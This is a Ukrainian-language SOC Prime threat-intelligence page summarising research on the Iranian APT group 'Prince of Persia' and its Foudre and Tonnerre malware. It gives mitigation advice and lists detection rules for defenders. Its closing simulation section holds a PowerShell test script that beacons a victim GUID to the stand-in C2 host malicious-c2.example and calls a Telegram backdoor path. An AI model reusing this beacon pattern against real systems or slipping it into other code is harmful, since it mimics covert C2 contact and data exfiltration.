SOC Prime Bias: Критичний

23 Dec 2025 10:56 UTC

Принц Персії: 10-річний ретроспективний погляд на активність APT в Ірані

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Принц Персії: 10-річний ретроспективний погляд на активність APT в Ірані
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Звіт описує пов’язане з Іраном угрупування APT під назвою Prince of Persia і простежує його прогрес протягом останнього десятиліття, з акцентом на діяльності, спостережуваній з 2023 по 2025 рік. Оператори покладаються на індивідуальні сімейства шкідливого програмного забезпечення, включаючи Foudre, Tonnerre, MaxPinner, Rugissement і Deep Freeze, для підтримки шпигунства та систематичного викрадення даних. Останні версії впроваджують алгоритми генерації доменів, управління та командування на базі Telegram і зашифровані SFX-навантаження для покращення стійкості та приховування. Мішенями є критична інфраструктура та мережі, пов’язані з дисидентами, в різних регіонах.

Дослідження

Дослідники SafeBreach стежили за операціями групи з 2019 року, збираючи нові зразки, документуючи архітектуру C2 та аналізуючи логику DGA. Вони розшифрували захищені навантаження, витягли облікові дані бота Telegram та побудували часову шкалу варіантів розгортання. Дослідження висвітлює окремі виробничі та тестові інфраструктури і деталі поведінки, пов’язаної з зараженням через Excel. Індикатори компрометації були зібрані з хешів шкідливого програмного забезпечення, доменів та URL-адрес.

Пом’якшення

Моніторьте активність DNS на предмет виявлених моделей DGA, блокуйте відомі шкідливі домени та обмежуйте або перевіряйте трафік, пов’язаний з ботами Telegram. Додайте виявлення для зазначених імен файлів шкідливого програмного забезпечення та артефактів DLL-завантажувача, а також використовуйте моніторинг DNS/секвестрацію для висвітлення обертової інфраструктури. Забезпечте дозволи списків застосунків та укріпите безпеку Office, обмежуючи макроси, щоб зменшити ймовірність початкового доступу.

Відповідь

Якщо знайдено будь-який індикатор, ізолюйте уражену систему, зберіть мінливі докази та проведіть цільову розвідку на відкладених файлах та відповідних шляхах реєстру. Блокуйте всі пов’язані домени та IP-адреси, оновіть токени бота Telegram та перевстановіть облікові дані для уражених облікових записів. Полюйте по всьому середовищу на залишки індивідуальних DLL-завантажувачів та зашифровані SFX-навантаження, щоб забезпечити повне викорінення.

Потік атаки

Детекції

Можливе зловживання Telegram як каналом команд та керування

Команда SOC Prime
22 Гру 2025

Можливе проникнення/експільтрація даних/C2 через сторонні служби/інструменти (через проксі)

Команда SOC Prime
22 Гру 2025

Підозріле управління командним і контрольним сервером незвичайним доменом верхнього рівня (TLD) DNS-запитом

Команда SOC Prime
22 Гру 2025

Підозріле виконання Taskkill (через командний рядок)

Команда SOC Prime
22 Гру 2025

ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 2

Правила AI SOC Prime
22 Гру 2025

ІОС (SourceIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом

Правила AI SOC Prime
22 Гру 2025

ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 1

Правила AI SOC Prime
22 Гру 2025

ІОС (HashMd5) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом

Правила AI SOC Prime
22 Гру 2025

ІОС (DestinationIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом

Правила AI SOC Prime
22 Гру 2025

Виявлення зараження Foudre v34 через файл Excel з вбудованим виконуваним файлом [Створення процесу Windows]

Правила AI SOC Prime
22 Гру 2025

Виявлення зв’язку C2 Foudre та Tonnerre [Мережеве з’єднання Windows]

Правила AI SOC Prime
22 Гру 2025

Виконання моделювання

Попередня умова: перевірка телеметрії та базових показників повинна бути пройденою.

Причина: Цей розділ детально описує точне виконання техніки супротивника (T1584.005), призначеної для запуску правила виявлення. Команди та розповідь МАЮТЬ конкретно відображати ідентифіковані TTP та мають на меті згенерувати саме ту телеметрію, яку очікує логіка виявлення.

  • Розповідь про атаку та команди:
    Актор загрози налаштував шкідливий домен malicious-c2.example , який хостить сервер C2 Foudre/Tonnerre. Навантаження нападника на машині жертви виконує два запити HTTP GET:

    1. Відправляє GUID жертви на кінцевий C2 Foudre, використовуючи шлях /1/?c=<GUID>.
    2. Зв’язується з API Telegram через задній хід Tonnerre, використовуючи шлях /t/tga.adr.

    Обидва запити виконуються через HTTP (для спрощення журналювання проксі) і містять загальний User-Agent для змішування із звичайним трафіком. Дії генерують точні поля (request_method=GET, url містять цільові підрядки), які відстежують правила Sigma.

  • Скрипт тестування регресії:

    # ------------------------------------------------------------
    # Моделювання зв’язку C2 Foudre & Tonnerre (Windows)
    # ------------------------------------------------------------
    
    # 1. Визначте GUID жертви (в реальній інфекції це буде зчитано з реєстру)
    $guid = (New-Guid).Guid
    
    # 2. Визначте шкідливий хост C2 (замініть на адресу, яку ви контролюєте для тестування)
    $c2Host = "http://malicious-c2.example"
    
    # 3. Відправити GUID на кінцевий C2 Foudre
    $foudreUrl = "$c2Host/1/?c=$guid"
    Write-Host "[*] Відправка GUID на Foudre C2: $foudreUrl"
    Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing
    
    # 4. Зв’язатися з API Telegram через задній хід Tonnerre
    $telegramUrl = "$c2Host/t/tga.adr"
    Write-Host "[*] Зв’язок з кінцевою точкою API Telegram: $telegramUrl"
    Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing
    
    Write-Host "[+] Моделювання завершено. Перевірте SIEM на наявність тривог."

    Скрипт автономний; його запуск на Windows хості, що маршрутизує трафік через налаштований проксі, створить два записи журналу, які відповідають умовам правила Sigma url|contains умовам.

  • Команди очищення:

    # Видалити будь-які тимчасові мережеві з'єднання (актуально тільки якщо проксі створює постійні сесії)
    # Тут ми просто очищаємо кеш DNS, щоб уникнути залишкового розв’язання шкідливого хоста.
    ipconfig /flushdns
    Write-Host "[*] Очищення завершено."